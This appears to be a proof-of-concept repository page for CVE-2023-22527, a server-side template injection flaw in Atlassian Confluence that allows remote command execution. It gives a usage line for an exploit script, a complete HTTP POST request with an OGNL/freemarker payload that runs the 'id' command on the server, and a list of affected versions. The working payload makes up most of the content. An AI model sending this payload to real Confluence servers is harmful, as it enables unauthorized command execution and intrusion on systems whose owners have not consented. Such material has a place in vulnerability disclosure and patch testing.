CVE-2023-22527 PoC — Atlassian Confluence 安全漏洞

Source

Associated Vulnerability

Description

CVE-2023-22527 | RCE using SSTI in Confluence

Readme

# CVE-2023-22527
CVE-2023-22527 | RCE using SSTI in Confluence


# Description
CVE-2023-22527 refers to an ServerSide template injection vulnerability in freemarker engine that allows users to execute command on the webserver.
This code is a proof-of-concept (PoC) script for exploiting CVE-2023-22527, which is described as a Server-Side Template Injection (SSTI) vulnerability in Atlassian Confluence.



# USAGE
```
python3 CVE-2023-22527.py -u  target.com -i
```

# Payload
```
POST /template/aui/text-inline.vm HTTP/1.1
Host: 127.0.0.1:8092
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 278

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().getWriter().write((new freemarker.template.utility.Execute()).exec({"id"}))
```

# Affected versions
```
8.0.x
8.1.x
8.2.x
8.3.x
8.4.x
8.5.0-8.5.3
```

# References
* [projectdiscovery](https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/)

File Snapshot

 [4.0K]  /data/pocs/b1cb6c7014f9578b387eacf9d3d7bd9c22f18226
├── [6.9K]  LICENSE
└── [1.1K]  README.md

0 directories, 2 files

Remarks